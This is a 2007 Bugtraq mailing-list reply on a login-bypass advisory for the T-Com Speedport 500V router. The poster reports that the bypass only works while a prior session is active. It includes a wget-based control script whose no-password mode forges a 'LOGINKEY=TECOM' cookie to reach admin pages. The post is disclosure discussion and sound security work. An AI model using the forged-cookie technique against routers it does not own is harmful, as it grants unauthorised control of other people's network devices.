lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070216102657.10214.qmail@securityfocus.com>
Date: 16 Feb 2007 10:26:57 -0000
From: kissme@...ke7.net
To: bugtraq@...urityfocus.com
Subject: Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V
 Login bypass

Hi,

I tried to use the security hole to speed up my control script for the
Speedport 500V Firmware 1.31 under Linux. Goal was to spare the login
request, which takes lots of seconds. But it does not work as expected.
The router remembers the login state. Access without password can only
be gained when the router (correctly) thinks I would still be logged in
from a previous session.

Thus, it seems to me that the security hole is less dangerous - just
always logout from the router. But I don't know whether all remote
control programs perform such logouts, and I did not try to access the
router from different computers, so I don't know whether the router
remembers _which_ computer is logged in.

If you want to reproduce my effects, do the following:

Save the script below to a file named Speedport500V.sh. Edit it and set
correct ADDR and set DO_LOGIN_LOGOUT=0 (thereby the password is not
required).

Now open a browser and login to the router.

Then, in a shell, say:
  ./Speedport500V.sh status

The output should be 'connected' or 'disconnected' depending on the
connection state. If the output is 'unknown' something went wrong.

Now do one of the following:
 - Go back to the browser on logout from the router.
 - Wait for a long time (session time-out).
 - Switch the router off and on.

Then try the above command again. It should say 'unknown' now, which
means that the access without password has been denied.

Now edit the script again, set correct PASSWORD and set
DO_LOGIN_LOGOUT=1. The script should work always now. Open a browser
and login to the router. Call the script once. Now try to navigate in
the open browser session - it will ask for the password, because the
script call has closed the session.


Here comes the script:

#!/bin/sh

ADDR="192.168.2.1"
PASSWORD="0000"
DO_LOGIN_LOGOUT=1

if (( $# != 1 )) ; then
  echo "Usage: $0 connect|disconnect|status"
  exit 1
fi

MY_PID=$$
COOKIE_FILE="/tmp/Speedport500V.cookie.$MY_PID"
STATUS_FILE="/tmp/Speedport500V.status.$MY_PID"

# Login
if [[ "$DO_LOGIN_LOGOUT" == "1" ]] ; then
  wget \
    -q \
    --save-cookies "$COOKIE_FILE"\
    --keep-session-cookies\
    -O /dev/null \
    --post-data "P1=$PASSWORD"\
    "http://$ADDR/start.login"
else
  echo -e "$ADDR\tFALSE\t/\tFALSE\t0\tLOGINKEY\tTECOM" > "$COOKIE_FILE"
fi

# Request
case "$1" in
  (connect)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE"\
      -O /dev/null \
      "http://$ADDR/pppctl.cmd?action=1"
  ;;
  (disconnect)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE"\
      -O /dev/null \
      "http://$ADDR/pppctl.cmd?action=0"
  ;;
  (status)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE"\
      -O "$STATUS_FILE" \
      "http://$ADDR/hcti_statoview.htm"
    if grep -q "var wan_status = 'Getrennt';" "$STATUS_FILE" ; then
      echo disconnected
    elif grep -q "var wan_status = 'Verbunden';" "$STATUS_FILE" ; then
      echo connected
    else
      echo unknown
    fi
    rm "$STATUS_FILE"
  ;;
  (*)
    echo "ERROR: illegal argument"
  ;;
esac

# Logout
if [[ "$DO_LOGIN_LOGOUT" == "1" ]] ; then
  wget \
    -q \
    --load-cookies "$COOKIE_FILE"\
    -O /dev/null \
    "http://$ADDR/logout.cmd"
fi
rm "$COOKIE_FILE"

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ